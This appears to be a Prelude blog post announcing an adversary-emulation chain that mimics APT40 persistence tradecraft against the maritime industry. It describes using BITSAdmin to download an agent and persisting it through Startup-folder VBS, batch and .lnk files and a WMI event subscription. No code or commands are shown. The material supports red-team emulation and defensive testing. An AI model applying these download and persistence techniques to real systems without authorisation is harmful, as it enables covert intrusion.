APT40 maritime industry
Bitsadmin.exe is a native Windows binary that can be used to download files. This chain downloads a Pneuma agent from Operator using Bitsadmin.exe and configures agent persistence through use of autoruns techniques. These techniques require a privileged agent running as Administrator.

TTP Tuesday: APT40 - Maritime Industry

Emulating APT40's malware persistence techniques

Theme Overview

Our last release looked at the APT40 targeting the defense industry with multi-stage Office documents to gain initial access.

For this week’s TTP Tuesday we are releasing a new APT40 themed chain based on persistence techniques used while targeting the maritime industry. Rather than persisting malware used by APT40 during their maritime-related targeting, each technique in this week’s chain will enable you to persist and spawn a new Pneuma session.

BITSAdmin

BITSAdmin is a Microsoft tool for managing Background Intelligent Transfer Service that is used to download or upload files from HTTP servers, SMB shares, and Windows updates. BITSAdmin is notable because an attacker may use this signed binary to download their payloads, or even execute code, and potentially evade detection or prevention. More information on BITSadmin abuse can be found on the LOLBAS project.

This week’s release contains a technique that uses BITSadmin to download a Pneuma agent from Operator and place it in a staging directory.

Windows Startup

The Windows Startup folder is used to launch applications and open documents automatically at Windows Startup. APT40 placed Windows Shortcuts (.lnk files) in the Startup folder to execute malware.

We’re releasing two methods of Startup persistence in this week’s chain; execution of a VBScript to download and run a Pneuma agent, and a .lnk file that executes a Pneuma agent from a staging directory.

As an added bonus, this week’s chain includes a WMI event subscription technique to start a new Pneuma session from a staging directory. Where our previous WMI persistence technique was used to execute disarmed malware, this week you’ll be able to spawn a new agent session back to Operator.

Thanks for reading! We’ll be back next week with more examples of APT40 tradecraft!

Check it out on the Prelude chains website.

Watch a demonstration: APT40 Maritime Industry

Staying up to date

Thanks for reading our latest TTP Tuesday release! Please subscribe and reach out with any feedback. We love to hear from our community!

There are several ways to follow us and learn more about Prelude and our team members:

Get our products

Download Prelude Operator: https://www.prelude.org/download/current
See the latest kill chain and TTP Releases: https://chains.prelude.org/
See our open-source repositories: https://github.com/preludeorg

Join our community

Discord: https://discord.gg/gzUv4XNquu
Reddit: https://www.reddit.com/r/preludeorg/
Twitter: https://twitter.com/preludeorg

Read, watch, and listen

Listen to our Podcast: https://anchor.fm/preludeorg
Read our blog: https://feed.prelude.org
Watch our live streams: https://www.twitch.tv/preludeorg
Watch our pre-recorded content: https://www.youtube.com/c/preludeorg

Follow our team

David: privateducky
Alex: khyberspache
Kris: Xanthonus
Octavia: VV_X_7
Sam: wasupwithuman

Source: https://feed.prelude.org
Read more

Execute this chain

Download Operator (1.7.0)
Learn about Operator

TTPs

Download Pneuma agent using BITSAdmin
Install agent persistence via StartUp VBS file
Install agent persistence via StartUp batch file
Install agent persistence via WMI event subscription
Install agent persistence via .LNK file

User-Set Custom Variables

  • staging_dir: C:\Perflogs